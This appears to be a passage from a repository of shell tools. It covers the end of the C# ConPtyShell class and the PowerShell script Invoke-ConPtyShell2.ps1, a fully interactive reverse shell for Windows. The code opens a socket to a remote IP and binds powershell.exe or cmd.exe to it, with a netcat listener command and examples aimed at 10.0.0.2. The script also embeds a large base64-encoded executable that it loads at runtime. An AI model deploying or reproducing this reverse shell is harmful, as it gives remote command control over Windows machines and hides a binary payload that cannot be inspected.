bufferSize=16*1024; 388 | byte[] bytesReceived = new byte[bufferSize]; 389 | bool writeSuccess = false; 390 | Int32 nBytesReceived = 0; 391 | uint bytesWritten = 0; 392 | do{ 393 | nBytesReceived = shellSocket.Receive(bytesReceived, (Int32)bufferSize, 0); 394 | writeSuccess = WriteFile(InputPipeWrite, bytesReceived, (uint)nBytesReceived, out bytesWritten, IntPtr.Zero); 395 | } while (nBytesReceived > 0 && writeSuccess); 396 | TerminateProcess(hChildProcess, 0); 397 | } 398 | 399 | private static Thread StartThreadReadSocketWritePipe(IntPtr InputPipeWrite, Socket shellSocket, IntPtr hChildProcess){ 400 | object[] threadParameters = new object[3]; 401 | threadParameters[0]=InputPipeWrite; 402 | threadParameters[1]=shellSocket; 403 | threadParameters[2]=hChildProcess; 404 | Thread thReadSocketWritePipe = new Thread(ThreadReadSocketWritePipe); 405 | thReadSocketWritePipe.Start(threadParameters); 406 | return thReadSocketWritePipe; 407 | } 408 | 409 | public static string SpawnConPtyShell(string remoteIp, int remotePort, uint rows, uint cols, string commandLine){ 410 | string output = ""; 411 | Socket shellSocket = ConnectSocket(remoteIp, remotePort); 412 | if(shellSocket == null){ 413 | output += string.Format("{0}Could not connect to ip {1} on port {2}", errorString, remoteIp, remotePort.ToString()); 414 | return output; 415 | } 416 | TryParseRowsColsFromSocket(shellSocket, ref rows, ref cols); 417 | IntPtr InputPipeRead = new IntPtr(0); 418 | IntPtr InputPipeWrite = new IntPtr(0); 419 | IntPtr OutputPipeRead = new IntPtr(0); 420 | IntPtr OutputPipeWrite = new IntPtr(0); 421 | IntPtr handlePseudoConsole = new IntPtr(0); 422 | PROCESS_INFORMATION childProcessInfo = new PROCESS_INFORMATION(); 423 | CreatePipes(ref InputPipeRead, ref InputPipeWrite, ref OutputPipeRead, ref OutputPipeWrite); 424 | InitConsole(); 425 | if(GetProcAddress(GetModuleHandle("kernel32"), "CreatePseudoConsole") == IntPtr.Zero){ 426 | Console.WriteLine("\r\nCreatePseudoConsole function not found! Spawning a netcat-like interactive shell...\r\n"); 427 | STARTUPINFO sInfo = new STARTUPINFO(); 428 | sInfo.cb = Marshal.SizeOf(sInfo); 429 | sInfo.dwFlags |= (Int32)STARTF_USESTDHANDLES; 430 | sInfo.hStdInput = InputPipeRead; 431 | sInfo.hStdOutput = OutputPipeWrite; 432 | sInfo.hStdError = OutputPipeWrite; 433 | CreateProcessW(null, commandLine, IntPtr.Zero, IntPtr.Zero, true, 0, IntPtr.Zero, null, ref sInfo, out childProcessInfo); 434 | } 435 | else{ 436 | Console.WriteLine("\r\nCreatePseudoConsole function found! Spawning a fully interactive shell...\r\n"); 437 | int pseudoConsoleCreationResult = CreatePseudoConsoleWithPipes(ref handlePseudoConsole, ref InputPipeRead, ref OutputPipeWrite, rows, cols); 438 | if(pseudoConsoleCreationResult != 0) 439 | { 440 | output += string.Format("{0}Could not create psuedo console. Error Code {1}", errorString, pseudoConsoleCreationResult.ToString()); 441 | return output; 442 | } 443 | childProcessInfo = CreateChildProcessWithPseudoConsole(handlePseudoConsole, commandLine); 444 | } 445 | // Note: We can close the handles to the PTY-end of the pipes here 446 | // because the handles are dup'ed into the ConHost and will be released 447 | // when the ConPTY is destroyed. 448 | if (InputPipeRead != IntPtr.Zero) CloseHandle(InputPipeRead); 449 | if (OutputPipeWrite != IntPtr.Zero) CloseHandle(OutputPipeWrite); 450 | //Threads have better performance than Tasks 451 | Thread thThreadReadPipeWriteSocket = StartThreadReadPipeWriteSocket(OutputPipeRead, shellSocket); 452 | Thread thReadSocketWritePipe = StartThreadReadSocketWritePipe(InputPipeWrite, shellSocket, childProcessInfo.hProcess); 453 | WaitForSingleObject(childProcessInfo.hProcess, INFINITE); 454 | //cleanup everything 455 | thThreadReadPipeWriteSocket.Abort(); 456 | thReadSocketWritePipe.Abort(); 457 | shellSocket.Shutdown(SocketShutdown.Both); 458 | shellSocket.Close(); 459 | CloseHandle(childProcessInfo.hThread); 460 | CloseHandle(childProcessInfo.hProcess); 461 | if (handlePseudoConsole != IntPtr.Zero) ClosePseudoConsole(handlePseudoConsole); 462 | if (InputPipeWrite != IntPtr.Zero) CloseHandle(InputPipeWrite); 463 | if (OutputPipeRead != IntPtr.Zero) CloseHandle(OutputPipeRead); 464 | output += "ConPtyShell kindly exited.\r\n"; 465 | return output; 466 | } 467 | } 468 | 469 | public static class ConPtyShellMainClass{ 470 | private static string help = ""; 471 | 472 | private static bool HelpRequired(string param) 473 | { 474 | return param == "-h" || param == "--help" || param == "/?"; 475 | } 476 | 477 | private static void CheckArgs(string[] arguments) 478 | { 479 | if(arguments.Length < 2){ 480 | Console.Out.Write("\r\nConPtyShell: Not enough arguments. 2 Arguments required. Use --help for additional help.\r\n"); 481 | System.Environment.Exit(0); 482 | } 483 | 484 | } 485 | 486 | private static void DisplayHelp() 487 | { 488 | Console.Out.Write(help); 489 | } 490 | 491 | private static string CheckRemoteIpArg(string ipString){ 492 | IPAddress address; 493 | if (!IPAddress.TryParse(ipString, out address)) 494 | { 495 | Console.Out.Write("\r\nConPtyShell: Invalid remoteIp value {0}\r\n", ipString); 496 | System.Environment.Exit(0); 497 | } 498 | return ipString; 499 | } 500 | 501 | private static int CheckInt(string arg){ 502 | int ret = 0; 503 | if (!Int32.TryParse(arg, out ret)) 504 | { 505 | Console.Out.Write("\r\nConPtyShell: Invalid integer value {0}\r\n", arg); 506 | System.Environment.Exit(0); 507 | } 508 | return ret; 509 | } 510 | 511 | private static uint ParseRows(string[] arguments){ 512 | uint rows = 24; 513 | if (arguments.Length > 2) 514 | rows = (uint)CheckInt(arguments[2]); 515 | return rows; 516 | } 517 | 518 | private static uint ParseCols(string[] arguments){ 519 | uint cols = 80; 520 | if (arguments.Length > 3) 521 | cols = (uint)CheckInt(arguments[3]); 522 | return cols; 523 | } 524 | 525 | private static string ParseCommandLine(string[] arguments){ 526 | string commandLine = "powershell.exe"; 527 | if (arguments.Length > 4) 528 | commandLine = arguments[4]; 529 | return commandLine; 530 | } 531 | 532 | public static string ConPtyShellMain(string[] args){ 533 | string output=""; 534 | if (args.Length == 1 && HelpRequired(args[0])) 535 | { 536 | DisplayHelp(); 537 | } 538 | else 539 | { 540 | CheckArgs(args); 541 | string remoteIp = CheckRemoteIpArg(args[0]); 542 | int remotePort = CheckInt(args[1]); 543 | uint rows = ParseRows(args); 544 | uint cols = ParseCols(args); 545 | string commandLine = ParseCommandLine(args); 546 | output=ConPtyShell.SpawnConPtyShell(remoteIp, remotePort, rows, cols, commandLine); 547 | } 548 | return output; 549 | } 550 | } 551 | "@; -------------------------------------------------------------------------------- /shells/Invoke-ConPtyShell2.ps1: -------------------------------------------------------------------------------- 1 | #Requires -Version 2 2 | 3 | function Invoke-ConPtyShell2 4 | { 5 | <# 6 | .SYNOPSIS 7 | ConPtyShell - Fully Interactive Reverse Shell for Windows 8 | Author: splinter_code 9 | License: MIT 10 | Source: https://github.com/antonioCoco/ConPtyShell 11 | 12 | .DESCRIPTION 13 | ConPtyShell - Fully interactive reverse shell for Windows 14 | 15 | Properly set the rows and cols values. You can retrieve it from 16 | your terminal with the command "stty size". 17 | 18 | You can avoid to set rows and cols values if you run your listener 19 | with the following command: 20 | stty raw -echo; (stty size; cat) | nc -lvnp 3001 21 | 22 | If you want to change the console size directly from powershell 23 | you can paste the following commands: 24 | $width=80 25 | $height=24 26 | $Host.UI.RawUI.BufferSize = New-Object Management.Automation.Host.Size ($width, $height) 27 | $Host.UI.RawUI.WindowSize = New-Object -TypeName System.Management.Automation.Host.Size -ArgumentList ($width, $height) 28 | 29 | 30 | .PARAMETER RemoteIp 31 | The remote ip to connect 32 | .PARAMETER RemotePort 33 | The remote port to connect 34 | .PARAMETER Rows 35 | Rows size for the console 36 | Default: "24" 37 | .PARAMETER Cols 38 | Cols size for the console 39 | Default: "80" 40 | .PARAMETER CommandLine 41 | The commandline of the process that you are going to interact 42 | Default: "powershell.exe" 43 | 44 | .EXAMPLE 45 | PS>Invoke-ConPtyShell2 10.0.0.2 3001 46 | 47 | Description 48 | ----------- 49 | Spawn a reverse shell 50 | 51 | .EXAMPLE 52 | PS>Invoke-ConPtyShell2 -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 30 -Cols 90 53 | 54 | Description 55 | ----------- 56 | Spawn a reverse shell with specific rows and cols size 57 | 58 | .EXAMPLE 59 | PS>Invoke-ConPtyShell2 -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 30 -Cols 90 -CommandLine cmd.exe 60 | 61 | Description 62 | ----------- 63 | Spawn a reverse shell (cmd.exe) with specific rows and cols size 64 | 65 | #> 66 | Param 67 | ( 68 | [Parameter(Position = 0, Mandatory = $True)] 69 | [String] 70 | $RemoteIp, 71 | 72 | [Parameter(Position = 1, Mandatory = $True)] 73 | [String] 74 | $RemotePort, 75 | 76 | [Parameter()] 77 | [String] 78 | $Rows = "24", 79 | 80 | [Parameter()] 81 | [String] 82 | $Cols = "80", 83 | 84 | [Parameter()] 85 | [String] 86 | $CommandLine = "powershell.exe" 87 | ) 88 | $parametersConPtyShell = @($RemoteIp, $RemotePort, $Rows, $Cols, $CommandLine) 89 | $ConPtyShellBase64 = "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RklMRV9TSEFSRV9XUklURQBGSUxFX0FUVFJJQlVURV9OT1JNQUwAT1BFTl9FWElTVElORwBTVERfSU5QVVRfSEFORExFAFNURF9PVVRQVVRfSEFORExFAFNURF9FUlJPUl9IQU5ETEUASW5pdGlhbGl6ZVByb2NUaHJlYWRBdHRyaWJ1dGVMaXN0AFVwZGF0ZVByb2NUaHJlYWRBdHRyaWJ1dGUAQ3JlYXRlUHJvY2VzcwBDcmVhdGVQcm9jZXNzVwBUZXJtaW5hdGVQcm9jZXNzAFdhaXRGb3JTaW5nbGVPYmplY3QAU2V0U3RkSGFuZGxlAEdldFN0ZEhhbmRsZQBDbG9zZUhhbmRsZQBDcmVhdGVQaXBlAENyZWF0ZUZpbGUAUmVhZEZpbGUAV3JpdGVGaWxlAENyZWF0ZVBzZXVkb0NvbnNvbGUAQ2xvc2VQc2V1ZG9Db25zb2xlAFNldENvbnNvbGVNb2RlAEdldENvbnNvbGVNb2RlAEdldE1vZHVsZUhhbmRsZQBHZXRQcm9jQWRkcmVzcwBTeXN0ZW0uTmV0LlNvY2tldHMAU29ja2V0AENvbm5lY3RTb2NrZXQAVHJ5UGFyc2VSb3dzQ29sc0Zyb21Tb2NrZXQAQ3JlYXRlUGlwZXMASW5pdENvbnNvbGUARW5hYmxlVmlydHVhbFRlcm1pbmFsU2VxdWVuY2VQcm9jZXNzaW5nAENyZWF0ZVBzZXVkb0NvbnNvbGVXaXRoUGlwZXMAQ29uZmlndXJlUHJvY2Vzc1RocmVhZABSdW5Qcm9jZXNzAENyZWF0ZUNoaWxkUHJvY2Vzc1dpdGhQc2V1ZG9Db25zb2xlAFRocmVhZFJlYWRQaXBlV3JpdGVTb2NrZXQAU3lzdGVtLlRocmVhZGluZwBUaHJlYWQAU3RhcnRUaHJlYWRSZWFkUGlwZVdyaXRlU29ja2V0AFRocmVhZFJlYWRTb2NrZXRXcml0ZVBpcGUAU3RhcnRUaHJlYWRSZWFkU29ja2V0V3JpdGVQaXBlAFNwYXduQ29uUHR5U2hlbGwAU3RhcnR1cEluZm8AbHBBdHRyaWJ1dGVMaXN0AGNiAGxwUmVzZXJ2ZWQAbHBEZXNrdG9wAGxwVGl0bGUAZHdYAGR3WQBkd1hTaXplAGR3WVNpemUAZHdYQ291bnRDaGFycwBkd1lDb3VudENoYXJzAGR3RmlsbEF0dHJpYnV0ZQBkd0ZsYWdzAHdTaG93V2luZG93AGNiUmVzZXJ2ZWQyAGxwUmVzZXJ2ZWQyAGhTdGRJbnB1dABoU3RkT3V0cHV0AGhTdGRFcnJvcgBoUHJvY2VzcwBoVGhyZWFkAGR3UHJvY2Vzc0lkAGR3VGhyZWFkSWQAbkxlbmd0aABscFNlY3VyaXR5RGVzY3JpcHRvcgBiSW5oZXJpdEhhbmRsZQBYAFkAaGVscABIZWxwUmVxdWlyZWQAQ2hlY2tBcmdzAERpc3BsYXlIZWxwAENoZWNrUmVtb3RlSXBBcmcAQ2hlY2tJbnQAUGFyc2VSb3dzAFBhcnNlQ29scwBQYXJzZUNvbW1hbmRMaW5lAENvblB0eVNoZWxsTWFpbgBNYWluAC5jdG9yAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBNYXJzaGFsQXNBdHRyaWJ1dGUAVW5tYW5hZ2VkVHlwZQBkd0F0dHJpYnV0ZUNvdW50AGxwU2l6ZQBhdHRyaWJ1dGUAbHBWYWx1ZQBjYlNpemUAbHBQcmV2aW91c1ZhbHVlAGxwUmV0dXJuU2l6ZQBscEFwcGxpY2F0aW9uTmFtZQBscENvbW1hbmRMaW5lAGxwUHJvY2Vzc0F0dHJpYnV0ZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGJJbmhlcml0SGFuZGxlcwBkd0NyZWF0aW9uRmxhZ3MAbHBFbnZpcm9ubWVudABscEN1cnJlbnREaXJlY3RvcnkAbHBTdGFydHVwSW5mbwBJbkF0dHJpYnV0ZQBscFByb2Nlc3NJbmZvcm1hdGlvbgBPdXRBdHRyaWJ1dGUAdUV4aXRDb2RlAGhIYW5kbGUAZHdNaWxsaXNlY29uZHMAblN0ZEhhbmRsZQBoT2JqZWN0AGhSZWFkUGlwZQBoV3JpdGVQaXBlAGxwUGlwZUF0dHJpYnV0ZXMAblNpemUAbHBGaWxlTmFtZQBkd0Rlc2lyZWRBY2Nlc3MAZHdTaGFyZU1vZGUAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25EaXNwb3NpdGlvbgBkd0ZsYWdzQW5kQXR0cmlidXRlcwBoVGVtcGxhdGVGaWxlAGhGaWxlAGxwQnVmZmVyAG5OdW1iZXJPZkJ5dGVzVG9SZWFkAGxwTnVtYmVyT2ZCeXRlc1JlYWQAbHBPdmVybGFwcGVkAG5OdW1iZXJPZkJ5dGVzVG9Xcml0ZQBscE51bWJlck9mQnl0ZXNX